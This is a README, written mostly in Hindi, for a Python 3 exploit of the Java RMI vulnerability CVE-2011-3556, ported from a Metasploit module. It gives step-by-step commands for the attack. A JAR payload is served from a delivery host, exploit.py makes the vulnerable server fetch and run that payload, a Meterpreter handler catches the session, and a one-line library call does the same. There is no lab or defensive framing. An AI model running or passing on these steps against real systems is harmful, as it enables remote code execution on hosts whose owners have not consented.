
Python 3 implementation of an existing CVE-2011-3556 proof of concept (PoC).
यह उपकरण mihi द्वारा Metasploit Framework के लिए बनाए गए मौजूदा अवधारणा का प्रमाण (PoC) का Python 3 कार्यान्वयन है।
मॉड्यूल का उपयोग करने के लिए, नीचे दिए गए निर्देशों का पालन करें:
# Clone this repository locally.
$ git clone https://github.com/sk4la/cve_2011_3556.git && cd cve_2011_3556/
# Optionally set the `x` bit to be able to execute the script directly.
$ chmod u+x exploit.py
$ ./exploit.py --help && echo "It works!"
कमजोर Java RMI सर्वर द्वारा दूरस्थ रूप से लोड करने के लिए, पेलोड (एक JAR बाइनरी) को HTTP संसाधन के रूप में प्रस्तुत किया जाना चाहिए। कोई इसे प्रसिद्ध python3 -m http.server का उपयोग करके शीघ्रता से प्रस्तुत कर सकता है।
एक बार पेलोड डाउनलोड के लिए उपलब्ध हो जाने पर, भेद्यता को ट्रिगर करने के लिए बस exploit.py स्क्रिप्ट निष्पादित करें।
$ python3 -m http.server --bind DELIVERY_HOST DELIVERY_PORT &
$ ./exploit.py -h VULNERABLE_HOST -u http://DELIVERY_HOST:DELIVERY_PORT/PAYLOAD.jar`
यदि पेलोड Meterpreter (Metasploit Framework) है, तो
use exploit/multi/handlerका उपयोग करना न भूलें।
इस मॉड्यूल का उपयोग लाइब्रेरी के रूप में भी किया जा सकता है, अपने वर्तमान नाम स्थान में cve_2011_3556 मॉड्यूल आयात करके:
from cve_2011_3556 import JavaRMIExploit
JavaRMIExploit("127.0.0.1", "http://127.0.0.1/payload.jar").exploit()
यह उतना ही सरल है!
Metasploit Framework मॉड्यूल के प्रारंभिक कार्यान्वयन के लिए mihi का विशेष धन्यवाद।